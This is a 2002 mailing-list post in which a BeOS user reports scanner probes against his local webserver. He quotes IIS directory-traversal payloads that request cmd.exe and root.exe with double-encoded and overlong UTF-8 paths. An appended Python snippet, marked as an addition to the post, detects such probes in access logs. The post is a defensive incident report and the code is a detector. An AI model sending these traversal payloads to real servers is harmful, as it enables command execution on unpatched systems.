[openbeos] I think someone tried to hack into my machine

  • From: "Daniel Reinhold" <danielr@xxxxxxxxxxxxx>
  • To: "Public OBOS mailing list" <openbeos@xxxxxxxxxxxxx>
  • Date: Tue, 19 Mar 2002 01:48:34 CST

Ok, this was rather interesting. It happened just about fifteen minutes 
ago (as I'm writing this).

I'm online (PPP dialup) and am also running a local webserver (i.e. 
sending requests to loopback address 127.0.0.1). Yeah, that's asking 
for trouble, at least theoretically. That is, someone on the internet, 
if they happened to get a hold of my (temporary, dynamically assigned) 
IP, could send requests for local files and have them sent back out 
across the network. I've never had anything weird happen before, so 
I've always been pretty blasé about the security risk.

Anyway, I'm just testing some news items locally before copying them 
over to the OpenBeOS website (which is my usual MO). Suddenly, I notice 
the Terminal window (largely covered by another window, but partially 
showing) has a flurry of text flying by and the DUN replicant in the 
Deskbar shows lots of bytes transmitting back and forth. Wtf? So I 
uncover the Terminal window (which is running the webserver) and see 
that a number of unusual requests have just been attended to. Here's 
the first one:

GET /scripts/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close

The remaining requests all look like that but with different URLs. Here 
are the other URLs that were requested:

GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

To me, that looks all the world like some hacker trying to grab files 
from my local machine. Could there be another explanation?

Of course, I'm running BeOS (and don't have NT) so my local webserver 
just returned a bunch of 404 (Not found) responses. Still, makes you 
wonder.

Has anyone else on this list had any similar experiences? What do you 
make of this?
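An added example, not part of the original post: detection logic in Python run over a constructed sample made of several of the request lines quoted above plus one benign request. It canonicalises each request path, undoing the double percent-encoding (%255c) and modelling the lenient two-byte UTF-8 decoding (%c0%2f, %c1%1c) that these probes rely on, then flags any path that traverses with '..' or ends in cmd.exe or root.exe. The lenient-decoder model and all function names are my assumptions, not anything from the post.

```python
import re
from urllib.parse import unquote_to_bytes
# Constructed sample: a subset of the probe lines quoted in the post plus one benign request.
SAMPLE_LOG = [
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
    "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /index.html HTTP/1.0",
]
TARGET_BINARIES = {"cmd.exe", "root.exe"}

def lenient_utf8(raw: bytes) -> str:
    # Assumed model of the lenient decoder these probes rely on: a 0xC0/0xC1 lead byte
    # plus any following byte is folded into one ASCII char (C0 2F -> '/', C1 1C -> '\').
    # Strict UTF-8 rejects such overlong forms; folding them lets the path normalise.
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else "?")  # other non-ASCII bytes: placeholder
            i += 1
    return "".join(out)

def canonical_path(path: str) -> str:
    # Percent-decode repeatedly (undoes %255c -> %5c -> '\'), then fold overlong
    # UTF-8 and normalise backslashes so every probe reduces to the same '..' form.
    raw = path.encode("ascii", "replace")
    for _ in range(3):  # three rounds covers the double encoding seen in the post
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    return lenient_utf8(raw).replace("\\", "/")

def classify_request(line: str):
    # Returns (canonical_path, reasons); an empty reasons list means not flagged.
    m = re.match(r"^\S+\s+(?P<target>\S+)\s+HTTP/", line)
    if not m:
        return ("", ["unparseable request line"])
    canon = canonical_path(m.group("target").split("?", 1)[0])
    reasons = []
    if ".." in canon.split("/"):
        reasons.append("directory traversal")
    if canon.rsplit("/", 1)[-1].lower() in TARGET_BINARIES:
        reasons.append("request for command interpreter")
    return (canon, reasons)
```

Feeding a server's access log through classify_request line by line gives a simple way to count how many of these probes hit a box in a session, independent of whether the paths actually exist on it.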
